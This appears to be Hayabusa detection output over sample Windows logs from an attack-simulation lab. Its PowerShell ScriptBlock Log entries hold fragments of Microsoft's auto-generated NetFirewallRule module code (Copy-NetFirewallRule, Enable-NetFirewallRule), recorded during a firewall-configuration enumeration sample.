[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdle",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"t.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) 
$__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 
'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { 
[object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, 
$__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetFirewallRule' function Enable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreS",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.582 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 